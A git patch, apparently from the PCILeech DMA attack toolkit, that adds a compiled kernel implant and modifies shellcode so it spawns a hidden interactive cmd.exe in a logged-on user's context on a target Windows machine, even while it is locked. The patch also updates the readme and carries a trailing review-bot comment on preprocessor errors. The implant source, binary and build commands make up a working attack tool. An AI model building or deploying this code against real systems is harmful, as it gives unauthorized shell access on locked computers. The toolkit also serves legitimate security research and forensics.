From a8f9bfc79d50388ebd84f634aa4e4b787e7e2f30 Mon Sep 17 00:00:00 2001 From: ufrisk Date: Thu, 29 Sep 2016 23:10:14 +0200 Subject: [PATCH] new implant: spawn cmd in user context [wx64_pscmd_user] --- pcileech_files/wx64_pscmd_user.ksh | Bin 0 -> 8104 bytes pcileech_shellcode/wx64_pscreate.c | 17 ++++++++++++++--- readme.md | 3 +++ 3 files changed, 17 insertions(+), 3 deletions(-) create mode 100644 pcileech_files/wx64_pscmd_user.ksh 
diff --git a/pcileech_files/wx64_pscmd_user.ksh b/pcileech_files/wx64_pscmd_user.ksh new file mode 100644 index 0000000000000000000000000000000000000000..f57787695f7e597e6c0909906c841883e0ef4998 GIT binary patch literal 8104 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 literal 0 HcmV?d00001 diff --git a/pcileech_shellcode/wx64_pscreate.c b/pcileech_shellcode/wx64_pscreate.c index 4538b66..4d0b71d 100644 --- a/pcileech_shellcode/wx64_pscreate.c +++ b/pcileech_shellcode/wx64_pscreate.c 
@@ -12,9 +12,15 @@
 //
 // ALTERNATIVELY (wx64_pscmd):
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM wx64_pscreate.c
 // ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
 // shellcode64.exe -o wx64_pscmd.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nonly work if the target system is locked and the login screen is\nvisible. If it takes time waiting - then please touch any key on\nthe target system. If the utility fails multiple times, please\ntry wx64_pscreate instead. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
+//
+// ALTERNATIVELY (wx64_pscmd_user):
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER wx64_pscreate.c
+// ml64 wx64_common_a.asm /Fewx64_pscmd_user.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
+// shellcode64.exe -o wx64_pscmd_user.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE AS USER ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nwill spawn a cmd.exe in the context of a random logged on user.\nThis will work even though the computer may be locked. If this\nutility fails multiple times, please try wx64_pscreate instead. 
\n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
 #include "wx64_common.h"
 #define MAGIC_WAIT_WORD 0x01234123412341234
@@ -717,13 +723,18 @@ VOID c_EntryPoint(_In_ PKMDDATA pk)
 KERNEL_FUNCTIONS2 fnk2;
 InitializeKernelFunctions(pk->AddrKernelBase, &fnk);
 InitializeKernelFunctions2(pk->AddrKernelBase, &fnk2);
+#ifdef _PSCMD_SYSTEM
+ CHAR szBINARY[] = { 'L', 'o', 'g', 'o', 'n', 'U', 'I', '.', 'e', 'x', 'e', 0 };
+#endif _PSCMD_SYSTEM
+#ifdef _PSCMD_USER
+ CHAR szBINARY[] = { 'e', 'x', 'p', 'l', 'o', 'r', 'e', 'r', '.', 'e', 'x', 'e', 0 };
+#endif _PSCMD_USER
 #ifdef _PSCMD
- CHAR szLOGONUI[] = { 'L', 'o', 'g', 'o', 'n', 'U', 'I', '.', 'e', 'x', 'e', 0 };
 CHAR szCMD[] = { 'c', ':', '\\', 'w', 'i', 'n', 'd', 'o', 'w', 's', '\\', 's', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'c', 'm', 'd', '.', 'e', 'x', 'e', 0 };
 pk->dataIn[1] = 0x08000000; // hidden window
 pk->dataIn[2] = 1; // interactive
 pk->dataIn[4] = 1; // multi thread hijack (boost)
- pk->dataOut[0] = GetPidFromPsName(&fnk, &fnk2, szLOGONUI, &pk->dataIn[0]);
+ pk->dataOut[0] = GetPidFromPsName(&fnk, &fnk2, szBINARY, &pk->dataIn[0]);
 if(pk->dataOut[0]) {
 pk->dataOut[1] = 0x101;
 return;
diff --git a/readme.md b/readme.md
index 889c2e2..0f5a501 100644
--- a/readme.md
+++ b/readme.md
@@ -133,3 +133,6 @@ v1.2
 * signature: Windows 10 updated.
 * signature: macOS Sierra added.
 * other: various bug fixes and stability improvements.
+
+latest
+* new implant: spawn cmd in user context [wx64_pscmd_user]
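Review bot: `#endif _PSCMD_SYSTEM` and `#endif _PSCMD_USER` in the c_EntryPoint hunk carry stray tokens after the directive, which standard C does not permit and which the `/W4` build documented in the header comment reports as a warning; write them as `#endif /* _PSCMD_SYSTEM */` and `#endif /* _PSCMD_USER */`. The new `szBINARY` is only declared when `_PSCMD_SYSTEM` or `_PSCMD_USER` is defined, yet the `#ifdef _PSCMD` block below uses it unconditionally, so a build with `/D_PSCMD` alone (the command the header previously documented) now fails on an undeclared identifier, and defining both selectors redefines the array. A guard placed before `#ifdef _PSCMD` makes the misconfiguration explicit at compile time: `#if defined(_PSCMD) && !defined(_PSCMD_SYSTEM) && !defined(_PSCMD_USER)` / `#error _PSCMD requires exactly one of _PSCMD_SYSTEM or _PSCMD_USER` / `#endif`. The enclosing c_EntryPoint starts and ends outside the hunk, so its remaining references to the old name, if any, are not visible here.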